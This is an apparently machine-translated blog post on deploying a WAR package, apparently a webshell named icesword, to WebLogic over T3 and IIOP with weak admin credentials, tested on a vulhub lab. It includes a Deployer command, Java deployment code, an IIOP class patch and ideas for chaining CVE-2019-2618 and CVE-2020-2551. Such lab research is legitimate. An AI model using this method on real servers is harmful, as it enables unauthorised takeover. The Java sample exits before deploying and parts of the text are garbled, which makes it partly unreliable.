Weblogic deploys war package through HTTP/T3/IIOP protocol

The Hydrology article mainly deals with the situation where there is a weak password but the Console is deleted.

Focus on saying three times: account password required, account password required, account password required

Several login points (HTTP/T3/IIOP) share the account lock, as long as the total number of errors exceeds five times, it will be locked for half an hour.

The most common practice: HTTP console application deployment

The most common method, skip it here.

You can refer to: https://www.cnblogs.com/DFX339/p/8515200.html

Deploy war package through T3 protocol

Prerequisites: The T3 protocol (default) is open, and there is no reverse proxy of the Nginx class in front.

I don’t know why I can’t connect directly with the built-in weblogic.Deployer class.

java.exe -cp weblogic.jar -Djava.ext.dirs=. weblogic.Deployer -adminurl t3://localhost:7001 -username weblogic -password weblogic123 -deploy  f:\test\icesword.war -remote -upload

Always prompt:

Unable to connect to ‘t3://localhost:7001’: null. Ensure the url represents a running admin server and that the credentials are correct. If using http protocol, tunneling must be enabled on the admin server.

Switch to deployment code here, you need to include the libraries in lib and module in weblogic.

import weblogic.deploy.api.tools.*;  //SesionHelper
import weblogic.deploy.api.spi .*;  //WebLogicDeploymentManager

import javax.enterprise.deploy.spi.Target;
import javax.enterprise.deploy.spi.exceptions.DeploymentManagerCreationException;
import javax.enterprise.deploy.spi.exceptions.TargetException;
import javax.enterprise.deploy.spi.status.DeploymentStatus;
import javax.enterprise.deploy.spi.status.ProgressObject;
import java.io.File;

public class T3 {
    
    
    public static void main(String args[]) throws DeploymentManagerCreationException, TargetException {
    
    
        String protocol="t3";
        String hostName="192.168.92.128";
        String portString="7001";
        String adminUser="weblogic";
        String adminPassword="Oracle@123";

        WebLogicDeploymentManager deployManager=SessionHelper.getRemoteDeploymentManager( protocol,hostName,portString,adminUser,adminPassword);
        DeploymentOptions options = new DeploymentOptions();
        Target targets[]=deployManager.getTargets();
        Target deployTargets[]=new Target[1];
        deployTargets[0]=targets[0]; //admin server
        System.out.println(deployTargets[0]);
        System.exit(0);
        String appName="icesword";
        options.setName(appName);
        ProgressObject processStatus=deployManager.deploy(deployTargets, new File("f:/test/icesword.war"), null,options);
        DeploymentStatus stat = processStatus.getDeploymentStatus() ;
        System.out.println("For icesword DeploymentStatus.getState(): " + stat.getState());

    }
}

Operation prompt: It

can be accessed normally, no screenshot will be taken here.

emm through the T3 protocol, you still have to use the HTTP DeploymentService interface to upload the war package, see IIOP below for details

Deploy via IIOP protocol

During the test, the weblogic docker in vulhub could not be connected normally.

Because the actual IP of docker is 172.19.0.2, and IIOP will return a redirection response after the handshake, redirect to the IP, the

solution (applicable to IIOP deserialization):
create a weblogic.iiop.IOPProfileclass yourself , modify the read(IIOPInputStream var1)method
in ConnectionKey var4 = new ConnectionKey(var1);Join later

 Channel remoteChannel = var1.getEndPoint().getRemoteChannel();
 var4 = new ConnectionKey(remoteChannel.getInetAddress().getHostAddress(), remoteChannel.getPublicPort());

Due to the ConnectionKey(IIOPInputStream var1)construction method, data will be read from the input stream. If this line is simply modified, subsequent streams will be read abnormally.

Modified Java file: https://gist.github.com/fnmsd/b3e90da874d779f665b3ba06f9c93a31

Change the protocol in the above code to iiop to deploy through the IIOP protocol.

But the capture of the package found that the war package was /bea_wls_deployment_internal/DeploymentServiceuploaded through this interface (the file upload vulnerability of CVE-2019-2618 and a deserialization vulnerability were through this interface)
Request:

Response: As

you can see, it contains thoughts about the file location after upload
:

1. This absolute path will be seen in IIOP's deployment message, which means that if the HTTP upload interface is closed, can it be deployed through other upload vulnerabilities + get the absolute path

2. Or is it possible to upload through the IIOP protocol alone?

3. Can it be deployed with Weblogic IIOP deserialization (CVE-2020-2551) bypassing authentication?

Deployment message:

Deployment through HTTP protocol (DeploymentService)

This time the direct protocol is not changed to HTTP, and a very strange error will be reported.

Packet capture found:

HTTP tunnel is disabled.

The HTTP tunnel needs to be enabled in the server configuration, and it can be used after startup, but this non-default configuration is not very meaningful.

I haven't found any other points that can be deployed via HTTP.

reference

https://github.com/vulhub/vulhub/tree/master/weblogic/weak_password

https://stackoverflow.com/questions/28002527/how-to-deploy-a-war-file-using-t3-protocol-weblogic-with-java

https://medium.com/@krishankantsinghal/deploying-undeploying-ear-war-to-weblogic-server-using-weblogic-deployer-62ca65c53ee6